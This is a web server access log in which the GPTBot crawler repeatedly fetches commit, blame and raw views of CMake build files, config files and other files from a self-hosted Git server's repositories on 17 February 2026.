+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10171] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:15:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11220] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11912] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" +[17/Feb/2026:15:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10182] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10182] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10181] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10182] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fstatus.json" [Client 74.7.227.38] [Length 22613] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" +[17/Feb/2026:15:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html%2fstatus.json" [Client 74.7.227.38] [Length 17234] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:15:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2ftemplates%2findex.html" [Client 74.7.227.38] [Length 29274] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:15:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11906] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" +[17/Feb/2026:15:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11907] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" +[17/Feb/2026:15:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15258] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2fstatus.json" [Client 74.7.227.38] [Length 16939] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:15:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" +[17/Feb/2026:15:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13153] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" +[17/Feb/2026:15:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" +[17/Feb/2026:15:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 14504] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:15:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9947] [Gzip 2.87] [Sent-to 192.168.0.250] 